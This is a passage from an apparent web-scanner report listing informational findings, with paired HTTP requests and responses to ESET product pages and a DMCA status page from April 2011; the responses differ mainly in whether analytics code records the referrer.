GET /Protection/Status.aspx?id=6d6905a9-aeec-4426-921a-33dc8d0cdfb9&PAGE_ID=aHR0cDovL3d3dy5yZXB1dGF0aW9uY2hhbmdlci5jb20vc2NoZWR1bGVkLmh0bWw1 HTTP/1.1
Host: www.dmca.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wubflym5pb53bt45ku4n3oa4

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: whoson=192808-61608.6367039; expires=Thu, 23-Jun-2011 23:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 16:06:48 GMT
Content-Length: 14197


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">

<head id="ctl00_mstrHead"><title>
   Reputation Changer | Protected by DMCA Protecti
...[SNIP]...
<br />Referer is:
           <br />PageKey is:
           <br />Language is: en-US
           <br />Browser Language is:en-US
           -->
           <input type="hidden" name="ctl00$cntBody$hidPageKey" id="ctl00_cntBody_hidPageKey" value="aHR0cDovL3d3dy5yZXB1dGF0aW9uY2hhbmdlci5jb20vc2NoZWR1bGVkLmh0bWw1" />
           




</div>

</div>



<script type="text/javascript">
//<![CDATA[
var __wpmExportWarning='a';var __wpmCloseProviderWarning='c';var __wpmDeleteWarning='b';Sys.Application.initialize();
//]]>
</script>
</form>

</body>
</html>
21.8. http://www.eset.com/us/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/

Request 1

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://shopping.netsuite.com/s.nl?sc=3&c=438708&n=1&ext=T
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=PC#1303736347554-914602.17#1304952755|check#true#1303743215|session#1303743154006-383984#1303745015; __utma=1.1646584456.1303732844.1303735979.1303743158.3; __utmc=1; __utmb=1.1.10.1303743158; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D3%7C1335268844052%3B%20s_visit%3D1%7C1303744959492%3B%20gpv_pageName%3Dus/new_homepage%7C1303744959494%3B%20s_nr%3D1303743159496-Repeat%7C1335279159496%3B%20s_invisit%3Dtrue%7C1303744959497%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=deleted; expires=Sun, 25-Apr-2010 15:16:46 GMT
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 15:16:47 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26704
Date: Mon, 25 Apr 2011 15:16:47 GMT
X-Varnish: 555652739
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
ng name, server, and channel on
the next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://shopping.netsuite.com/s.nl?sc=3&c=438708&n=1&ext=T";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>
<script type="text/javascript">
   mboxDefine('','home_ticker_clicked');
       function ticker_Log(URL)
       {
           var mboxDestination = ("Destination="+URL);
           mboxUpdate('home_ticker_clicked',mboxDestination);
       }
</script>

Request 2

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=PC#1303736347554-914602.17#1304952755|check#true#1303743215|session#1303743154006-383984#1303745015; __utma=1.1646584456.1303732844.1303735979.1303743158.3; __utmc=1; __utmb=1.1.10.1303743158; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D3%7C1335268844052%3B%20s_visit%3D1%7C1303744959492%3B%20gpv_pageName%3Dus/new_homepage%7C1303744959494%3B%20s_nr%3D1303743159496-Repeat%7C1335279159496%3B%20s_invisit%3Dtrue%7C1303744959497%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=deleted; expires=Sun, 25-Apr-2010 15:17:20 GMT
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 15:17:21 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26653
Date: Mon, 25 Apr 2011 15:17:21 GMT
X-Varnish: 555654547
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
ng name, server, and channel on
the next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="direct";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>
<script type="text/javascript">
   mboxDefine('','home_ticker_clicked');
       function ticker_Log(URL)
       {
           var mboxDestination = ("Destination="+URL);
           mboxUpdate('home_ticker_clicked',mboxDestination);
       }
</script>
21.9. http://www.eset.com/us/business/products  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/business/products

Request 1

GET /us/business/products HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/server-security/linux-file
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response 1

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21118
Date: Mon, 25 Apr 2011 12:58:53 GMT
X-Varnish: 1310977832
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
ifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.eset.com/us/business/server-security/linux-file";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>

Request 2

GET /us/business/products HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response 2

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21066
Date: Mon, 25 Apr 2011 12:59:04 GMT
X-Varnish: 1310978379
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
ifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="direct";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>
21.10. http://www.eset.com/us/business/server-security/linux-file  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/business/server-security/linux-file

Request 1

GET /us/business/server-security/linux-file HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.1.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738137976%3B%20gpv_pageName%3Dus/business/products%7C1303738137981%3B%20s_nr%3D1303736337984-Repeat%7C1335272337984%3B%20s_invisit%3Dtrue%7C1303738137988%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B

Response 1

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 17290
Date: Mon, 25 Apr 2011 12:58:48 GMT
X-Varnish: 1310977676
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>M
...[SNIP]...
ifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>

Request 2

GET /us/business/server-security/linux-file HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.1.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738137976%3B%20gpv_pageName%3Dus/business/products%7C1303738137981%3B%20s_nr%3D1303736337984-Repeat%7C1335272337984%3B%20s_invisit%3Dtrue%7C1303738137988%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B

Response 2

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 17208
Date: Mon, 25 Apr 2011 12:58:58 GMT
X-Varnish: 1310978090
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>M
...[SNIP]...
ifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="direct";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>
21.11. http://www.eset.com/us/home/smart-security  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/home/smart-security

Request 1

GET /us/home/smart-security HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=PC#1303736347554-914602.17#1304952767|check#true#1303743227|session#1303743154006-383984#1303745027; __utma=1.1646584456.1303732844.1303735979.1303743158.3; __utmc=1; __utmb=1.2.10.1303743158; s_pers=%20s_vnum%3D1335268844052%2526vn%253D3%7C1335268844052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%252C%255B%2527Other%252520Referrers-shopping.netsuite.com%2527%252C%25271303743170439%2527%255D%255D%7C1461595970439%3B%20s_visit%3D1%7C1303745017240%3B%20gpv_pageName%3Dus/new_homepage%7C1303745017242%3B%20s_nr%3D1303743217244-Repeat%7C1335279217244%3B%20s_invisit%3Dtrue%7C1303745017246%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedshopping.netsuite.comshopping.netsuite.com%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/new_homepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/home/smart-security%252526ot%25253DA%3B

Response 1

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25484
Date: Mon, 25 Apr 2011 15:17:24 GMT
X-Varnish: 555654660
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
dentifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.eset.com/us/";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>

Request 2

GET /us/home/smart-security HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=PC#1303736347554-914602.17#1304952767|check#true#1303743227|session#1303743154006-383984#1303745027; __utma=1.1646584456.1303732844.1303735979.1303743158.3; __utmc=1; __utmb=1.2.10.1303743158; s_pers=%20s_vnum%3D1335268844052%2526vn%253D3%7C1335268844052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%252C%255B%2527Other%252520Referrers-shopping.netsuite.com%2527%252C%25271303743170439%2527%255D%255D%7C1461595970439%3B%20s_visit%3D1%7C1303745017240%3B%20gpv_pageName%3Dus/new_homepage%7C1303745017242%3B%20s_nr%3D1303743217244-Repeat%7C1335279217244%3B%20s_invisit%3Dtrue%7C1303745017246%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedshopping.netsuite.comshopping.netsuite.com%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/new_homepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/home/smart-security%252526ot%25253DA%3B

Response 2

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25467
Date: Mon, 25 Apr 2011 15:17:36 GMT
X-Varnish: 555655337
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
dentifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="direct";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
